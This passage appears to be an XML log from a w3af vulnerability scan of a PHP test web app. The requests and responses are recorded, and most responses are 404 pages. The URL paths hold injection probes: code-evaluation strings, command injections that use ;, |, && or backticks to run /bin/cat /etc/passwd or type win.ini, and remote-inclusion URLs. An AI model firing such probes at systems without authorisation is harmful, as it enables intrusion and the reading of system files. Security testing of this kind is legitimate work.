                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22iyyrl%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="256">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/print+%27iyyrl%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27iyyrl%27x5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27iyyrl%27x5'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="257">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/echo+str_repeat%28%27iyyrl%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about echo+str_repeat%28%27iyyrl%27%2C5%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='echo+str_repeat%28%27iyyrl%27%2C5%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="259">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/print+%27iyyrl%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27iyyrl%27%2A5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27iyyrl%27%2A5'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="262">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="265">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="266">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="267">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="268">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about /bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="269">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="271">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="273">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="274">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="275">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="276">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="277">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="278">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="279">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60/bin/cat+/etc/passwd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60/bin/cat+/etc/passwd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/g70HkPDQ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about g70HkPDQ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='g70HkPDQ'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="287">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="309">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="311">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%27b%22c%27d%22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%27b%22c%27d%22'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="312">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="314">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
